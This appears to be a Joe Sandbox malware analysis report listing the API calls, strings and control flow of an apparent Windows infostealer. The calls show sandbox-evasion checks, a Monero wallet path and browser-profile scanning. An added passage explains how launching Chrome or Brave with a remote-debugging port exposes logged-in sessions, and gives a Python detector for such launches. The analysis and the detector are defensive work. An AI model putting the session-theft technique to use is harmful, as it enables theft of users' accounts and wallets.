                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00D48F78,?,000F10F4,?,00000000,?,000F10F8,?,00000000,000F0AF3), ref: 000E6D6A
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 000E6D88
                            • CloseHandle.KERNEL32(00000000), ref: 000E6D99
                            • Sleep.KERNEL32(00001770), ref: 000E6DA4
                            • CloseHandle.KERNEL32(?,00000000,?,00D48F78,?,000F10F4,?,00000000,?,000F10F8,?,00000000,000F0AF3), ref: 000E6DBA
                            • ExitProcess.KERNEL32 ref: 000E6DC2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                            • String ID:
                            • API String ID: 2525456742-0
                            • Opcode ID: 1683118f020c96273bf37ff1cadb543a2d10d61a2bc969417ac6842bda66f8eb
                            • Instruction ID: 117b8abee397639572f9c24093a07b5e3deac5da346ca509f803e3bdf84511b3
                            • Opcode Fuzzy Hash: 1683118f020c96273bf37ff1cadb543a2d10d61a2bc969417ac6842bda66f8eb
                            • Instruction Fuzzy Hash: 9531F671E04248AFCB14FBE2EC66AFE7379AF59340F504919F21276193DF706A05CA62

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1436 d1220-d1247 call e8b40 GlobalMemoryStatusEx 1439 d1249-d1271 call edd30 * 2 1436->1439 1440 d1273-d127a 1436->1440 1442 d1281-d1285 1439->1442 1440->1442 1444 d129a-d129d 1442->1444 1445 d1287 1442->1445 1446 d1289-d1290 1445->1446 1447 d1292-d1294 ExitProcess 1445->1447 1446->1444 1446->1447
                            APIs
                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 000D123E
                            • __aulldiv.LIBCMT ref: 000D1258
                            • __aulldiv.LIBCMT ref: 000D1266
                            • ExitProcess.KERNEL32 ref: 000D1294
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 3404098578-2766056989
                            • Opcode ID: d509d7a870e33d814d87f32a336afde36a1bc014510c3f1e1b440402a5349432
                            • Instruction ID: 27223e94396b0ac256b19da7e5a60b455b9bbe48fc541acad66d17cea7525e80
                            • Opcode Fuzzy Hash: d509d7a870e33d814d87f32a336afde36a1bc014510c3f1e1b440402a5349432
                            • Instruction Fuzzy Hash: 24011DB0D84308BEEF10DFE4CC4ABEEBBB8EB14705F20844AE604B62C1DB7555558B69

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1450 e6d93 1451 e6daa 1450->1451 1453 e6dac-e6dc2 call e6bc0 call e5d60 CloseHandle ExitProcess 1451->1453 1454 e6d5a-e6d77 call eade0 OpenEventA 1451->1454 1459 e6d79-e6d91 call eade0 CreateEventA 1454->1459 1460 e6d95-e6da4 CloseHandle Sleep 1454->1460 1459->1453 1460->1451
                            APIs
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00D48F78,?,000F10F4,?,00000000,?,000F10F8,?,00000000,000F0AF3), ref: 000E6D6A
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 000E6D88
                            • CloseHandle.KERNEL32(00000000), ref: 000E6D99
                            • Sleep.KERNEL32(00001770), ref: 000E6DA4
                            • CloseHandle.KERNEL32(?,00000000,?,00D48F78,?,000F10F4,?,00000000,?,000F10F8,?,00000000,000F0AF3), ref: 000E6DBA
                            • ExitProcess.KERNEL32 ref: 000E6DC2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                            • String ID:
                            • API String ID: 941982115-0
                            • Opcode ID: e9cb8e4af8842b537f28aeef22c7758f11012fbb38b3926add357c219ce2c8ff
                            • Instruction ID: 5e8451886db475a4082f7935aca36ee57d0b16188fbd6b1307fbe34e13ddd72a
                            • Opcode Fuzzy Hash: e9cb8e4af8842b537f28aeef22c7758f11012fbb38b3926add357c219ce2c8ff
                            • Instruction Fuzzy Hash: DBF05E30F4C249EFEB61ABA2EC4ABFD73B8AF25781F504515B512B5192CBB16500CA51

                            Control-flow Graph

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000D4889
                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 000D4899
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1274457161-4251816714
                            • Opcode ID: f4b0d19623a89401b5ce577c880d850199d6e777dac26919dca5fd98de537994
                            • Instruction ID: 2a64f6df4cc458784af18841ba912b156740ee3413899cce383e9309e844761b
                            • Opcode Fuzzy Hash: f4b0d19623a89401b5ce577c880d850199d6e777dac26919dca5fd98de537994
                            • Instruction Fuzzy Hash: 16213EB1E00209ABDF14DFA5EC45ADE7B75FB45320F108625F925A7281EB706A05CF91

                            APIs
                              • Part of subcall function 000EAAB0: lstrcpy.KERNEL32(?,00000000), ref: 000EAAF6
                              • Part of subcall function 000D62D0: InternetOpenA.WININET(000F0DFF,00000001,00000000,00000000,00000000), ref: 000D6331
                              • Part of subcall function 000D62D0: StrCmpCA.SHLWAPI(?,00D4E898), ref: 000D6353
                              • Part of subcall function 000D62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000D6385
                              • Part of subcall function 000D62D0: HttpOpenRequestA.WININET(00000000,GET,?,00D4DE70,00000000,00000000,00400100,00000000), ref: 000D63D5
                              • Part of subcall function 000D62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000D640F
                              • Part of subcall function 000D62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000D6421
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000E5478
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                            • String ID: ERROR$ERROR
                            • API String ID: 3287882509-2579291623
                            • Opcode ID: 8d3a912f70f7829246a00b00752d45f1f2a5b363d2f97bf7f6bf69a4ca957ff5
                            • Instruction ID: a6cd450e1607435a2613e68042a553436471052ac9b616d35c21a58d3fce7e2d
                            • Opcode Fuzzy Hash: 8d3a912f70f7829246a00b00752d45f1f2a5b363d2f97bf7f6bf69a4ca957ff5
                            • Instruction Fuzzy Hash: A7110330A00588AFDB14FFA5DDA2AED73399F55340F414568F91A6B593EF30BB04CA62
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000E7AA0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E7AA7
                            • GetComputerNameA.KERNEL32(?,00000104), ref: 000E7ABF
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: 227a161f292abc85c9bbea268eaa024e6edc2293d84d931b217bdaa6969fbad8
                            • Instruction ID: f75776be2366883c528354b4dbfb56672332616e64845bd0f05dc2260daa60bc
                            • Opcode Fuzzy Hash: 227a161f292abc85c9bbea268eaa024e6edc2293d84d931b217bdaa6969fbad8
                            • Instruction Fuzzy Hash: 4D0186B1A08249AFC714DF99DD85BAEBBBCF745711F10052AF615E2680D7745A0087A1
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 000D112B
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 000D1132
                            • ExitProcess.KERNEL32 ref: 000D1143
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$AllocCurrentExitNumaVirtual
                            • String ID:
                            • API String ID: 1103761159-0
                            • Opcode ID: 9cabec9acff04be218fedd099ba1f750a4f752a58319997465f7be475cb3bb02
                            • Instruction ID: cd26ce61207e038075bb5aeb7ce8e76812c369022653d1771a449f5eeb5b980a
                            • Opcode Fuzzy Hash: 9cabec9acff04be218fedd099ba1f750a4f752a58319997465f7be475cb3bb02
                            • Instruction Fuzzy Hash: B1E08670A49308FBE7116B909C0AB4C7A6C9B05B01F100045F708761D0CAB425404658
                            APIs
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 000D10B3
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 000D10F7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: c3859a738e9b3b2c39693f7dc7fde1e8c7980e1f6ee9f1a94bf6ea0a0a32640b
                            • Instruction ID: 89714324b3151be164ac564cc95f11c91d95af803cead7983df1201675baa197
                            • Opcode Fuzzy Hash: c3859a738e9b3b2c39693f7dc7fde1e8c7980e1f6ee9f1a94bf6ea0a0a32640b
                            • Instruction Fuzzy Hash: 58F082B1641318BBE714AAA4AC99FEEB7DCE706B05F304949F504E7290DA719E009BA4
                            APIs
                              • Part of subcall function 000E7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000E7AA0
                              • Part of subcall function 000E7A70: RtlAllocateHeap.NTDLL(00000000), ref: 000E7AA7
                              • Part of subcall function 000E7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 000E7ABF
                              • Part of subcall function 000E79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000D11B7), ref: 000E7A10
                              • Part of subcall function 000E79E0: RtlAllocateHeap.NTDLL(00000000), ref: 000E7A17
                              • Part of subcall function 000E79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 000E7A2F
                            • ExitProcess.KERNEL32 ref: 000D11C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AllocateName$ComputerExitUser
                            • String ID:
                            • API String ID: 3550813701-0
                            • Opcode ID: f229cf4787f24393015371b73479c224c1cf5d62daebe62e71504610a7ac395d
                            • Instruction ID: 68cd9f07b0ff010008bc98efb623935da7250f57b1d7f68ddd23ca7395eb6804
                            • Opcode Fuzzy Hash: f229cf4787f24393015371b73479c224c1cf5d62daebe62e71504610a7ac395d
                            • Instruction Fuzzy Hash: 22E012B5D483416BCA10B3B67C47B9B72CC5B5530AF040415F90CA2203EE25E8014275
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                            • FindFirstFileA.KERNEL32(00000000,?,000F0B32,000F0B2F,00000000,?,?,?,000F1450,000F0B2E), ref: 000DBEC5
                            • StrCmpCA.SHLWAPI(?,000F1454), ref: 000DBF33
                            • StrCmpCA.SHLWAPI(?,000F1458), ref: 000DBF49
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000DC8A9
                            • FindClose.KERNEL32(000000FF), ref: 000DC8BB
                            Strings
                            • --remote-debugging-port=9229 --profile-directory=", xrefs: 000DC495
                            • Preferences, xrefs: 000DC104
                            • --remote-debugging-port=9229 --profile-directory=", xrefs: 000DC534
                            • \Brave\Preferences, xrefs: 000DC1C1
                            • Brave, xrefs: 000DC0E8
                            • --remote-debugging-port=9229 --profile-directory=", xrefs: 000DC3B2
                            • Google Chrome, xrefs: 000DC6F8
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 3334442632-1869280968
                            • Opcode ID: e6693cbc9cf0506a5bc73ddd3e9a55655313dfb2a1bbde5a88dc98007942040a
                            • Instruction ID: cc199bdf3478cb612f2871b84d5ab6cf11e09251133de7095bb59986b2bb96f4
                            • Opcode Fuzzy Hash: e6693cbc9cf0506a5bc73ddd3e9a55655313dfb2a1bbde5a88dc98007942040a
                            • Instruction Fuzzy Hash: C0525472A002489FCB14FB61DDA6EEE737DAF59300F414599B50A76192EF306B48CF62
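                            The function above walks browser profile directories and carries the launch string `--remote-debugging-port=9229 --profile-directory="` next to the names `Brave`, `Google Chrome` and `Preferences`: a Chromium browser started this way exposes the DevTools protocol on a local port, which lets the caller read the logged-in session without touching the encrypted cookie store. The following detector is an added example, not part of the Joe Sandbox report or of the sample; it runs over process-creation records in a constructed, flattened `Key: Value|Key: Value` layout standing in for a Sysmon Event ID 1 export, and the browser executable list beyond Brave and Chrome is an assumption.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Chromium-based browsers that honour --remote-debugging-port. The sample's strings
# name only Brave and Google Chrome; the remaining entries are an assumption.
CHROMIUM_BROWSERS = {
    "chrome.exe", "brave.exe", "msedge.exe", "opera.exe", "vivaldi.exe", "chromium.exe",
}

REMOTE_DEBUG_RE = re.compile(r"--remote-debugging-port=(\d+)", re.IGNORECASE)
# The sample's string ends in an opening quote, so a quoted profile name is expected;
# an unquoted one is accepted as well.
PROFILE_DIR_RE = re.compile(r'--profile-directory=(?:"([^"]*)"|(\S+))', re.IGNORECASE)


@dataclass
class Finding:
    pid: int
    image: str
    parent_image: str
    port: int
    profile: str


def parse_event(line: str) -> Dict[str, str]:
    """Parse one flattened 'Key: Value|Key: Value' process-creation record.

    Constructed stand-in for a Sysmon Event ID 1 export. Only the first ':' of
    each field separates key from value, so paths keep their drive colon.
    """
    fields: Dict[str, str] = {}
    for part in line.split("|"):
        key, _, value = part.partition(":")
        fields[key.strip()] = value.strip()
    return fields


def detect_remote_debug_launch(line: str) -> Optional[Finding]:
    """Return a Finding when a Chromium browser starts with a remote-debugging port."""
    ev = parse_event(line)
    image = ev.get("Image", "")
    exe = image.rsplit("\\", 1)[-1].lower()
    if exe not in CHROMIUM_BROWSERS:
        return None
    cmdline = ev.get("CommandLine", "")
    port_match = REMOTE_DEBUG_RE.search(cmdline)
    if port_match is None:
        return None
    profile = ""
    profile_match = PROFILE_DIR_RE.search(cmdline)
    if profile_match:
        profile = profile_match.group(1) or profile_match.group(2) or ""
    return Finding(
        pid=int(ev.get("ProcessId", "0")),
        image=image,
        parent_image=ev.get("ParentImage", ""),
        port=int(port_match.group(1)),
        profile=profile,
    )


def scan(lines: List[str]) -> List[Finding]:
    """Run the detector over a batch of records and keep only the hits."""
    return [f for f in map(detect_remote_debug_launch, lines) if f is not None]


# Constructed sample records: the first two mirror the behaviour reported above
# (browser spawned by file.exe with port 9229); the last two are benign launches.
SAMPLE_EVENTS = [
    r'EventID: 1|ProcessId: 4120|Image: C:\Program Files\Google\Chrome\Application\chrome.exe'
    r'|ParentImage: C:\Users\user\Desktop\file.exe'
    r'|CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" '
    r'--remote-debugging-port=9229 --profile-directory="Default"',
    r'EventID: 1|ProcessId: 4188|Image: C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe'
    r'|ParentImage: C:\Users\user\Desktop\file.exe'
    r'|CommandLine: "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" '
    r'--remote-debugging-port=9229 --profile-directory="Profile 1"',
    r'EventID: 1|ProcessId: 5000|Image: C:\Program Files\Google\Chrome\Application\chrome.exe'
    r'|ParentImage: C:\Windows\explorer.exe'
    r'|CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default"',
    r'EventID: 1|ProcessId: 5100|Image: C:\Windows\System32\notepad.exe'
    r'|ParentImage: C:\Windows\explorer.exe'
    r'|CommandLine: notepad.exe --remote-debugging-port=9229',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"pid={hit.pid} port={hit.port} profile={hit.profile!r} "
              f"image={hit.image} parent={hit.parent_image}")
```

                            Developer tooling (Selenium, Puppeteer, manual DevTools use) also passes `--remote-debugging-port`, so the parent image is kept in each finding for triage: in the behaviour reported here the parent would be the submitted sample rather than a terminal, IDE or test runner, and the browser is launched against an existing user profile rather than a fresh one.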
                            APIs
                            • wsprintfA.USER32 ref: 000E3B1C
                            • FindFirstFileA.KERNEL32(?,?), ref: 000E3B33
                            • lstrcat.KERNEL32(?,?), ref: 000E3B85
                            • StrCmpCA.SHLWAPI(?,000F0F58), ref: 000E3B97
                            • StrCmpCA.SHLWAPI(?,000F0F5C), ref: 000E3BAD
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000E3EB7
                            • FindClose.KERNEL32(000000FF), ref: 000E3ECC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 1125553467-2524465048
                            • Opcode ID: 46b4f6aaf70eb8e8de15265a1cf2f27364dcb4fce760a55963c44149b68cde4d
                            • Instruction ID: d45549ea5f24fbf9a781924e17aaa05cd3869192361f4f95a0e2bd241fb4a8e5
                            • Opcode Fuzzy Hash: 46b4f6aaf70eb8e8de15265a1cf2f27364dcb4fce760a55963c44149b68cde4d
                            • Instruction Fuzzy Hash: 97A14271A002489FDB75DFA5DC89FEE77BCAB49300F044599B60DA6181DB709B84CF61
                            APIs
                            • wsprintfA.USER32 ref: 000E4B7C
                            • FindFirstFileA.KERNEL32(?,?), ref: 000E4B93
                            • StrCmpCA.SHLWAPI(?,000F0FC4), ref: 000E4BC1
                            • StrCmpCA.SHLWAPI(?,000F0FC8), ref: 000E4BD7
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000E4DCD
                            • FindClose.KERNEL32(000000FF), ref: 000E4DE2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s$%s\%s$%s\*
                            • API String ID: 180737720-445461498
                            • Opcode ID: 46221fd79e1a654b49bab346d9919fc349ea411ff022b6b18244c435db4b4bfd
                            • Instruction ID: 6f9f6f19b6a98444a27265299c51bb881c64cb93e8bf2521f9b8caa00bf0cba9
                            • Opcode Fuzzy Hash: 46221fd79e1a654b49bab346d9919fc349ea411ff022b6b18244c435db4b4bfd
                            • Instruction Fuzzy Hash: 0F613872904219AFCB25EFA0DC85FEA737CBB49701F008598F60996151EF74AB88CF91
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 000E47D0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E47D7
                            • wsprintfA.USER32 ref: 000E47F6
                            • FindFirstFileA.KERNEL32(?,?), ref: 000E480D
                            • StrCmpCA.SHLWAPI(?,000F0FAC), ref: 000E483B
                            • StrCmpCA.SHLWAPI(?,000F0FB0), ref: 000E4851
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000E48DB
                            • FindClose.KERNEL32(000000FF), ref: 000E48F0
                            • lstrcat.KERNEL32(?,00D4E918), ref: 000E4915
                            • lstrcat.KERNEL32(?,00D4D720), ref: 000E4928
                            • lstrlen.KERNEL32(?), ref: 000E4935
                            • lstrlen.KERNEL32(?), ref: 000E4946
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
